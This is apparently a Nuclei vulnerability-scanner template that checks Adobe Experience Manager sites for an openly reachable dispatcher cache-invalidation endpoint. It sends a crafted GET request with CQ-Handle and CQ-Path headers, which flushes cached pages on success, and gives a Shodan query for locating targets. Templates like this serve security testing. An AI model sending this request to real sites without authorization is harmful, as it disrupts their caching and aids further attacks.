id: aem-cached-pages

info:
  name: Invalidate / Flush Cached Pages on AEM
  author: hetroublemakr
  severity: low
  reference:
    - https://twitter.com/AEMSecurity/status/1244965623689609217
  metadata:
    max-request: 1
    shodan-query: http.component:"Adobe Experience Manager"
  tags: Adobe-Experience-Manager

http:
  - method: GET
    path:
      - "{{BaseURL}}/dispatcher/invalidate.cache"

    headers:
      CQ-Handle: /content
      CQ-Path: /content

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<H1>OK</H1>"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100fa449369a6b6a19ef08cfa7a83f341000fcbeff5f0fe0b11f236a2463c6fc27802204261447eae5853abfbe57ff0be79318ab2cb59f47717c548474bb6f5e8225959:922c64590222798bb761d5b6d8e72950
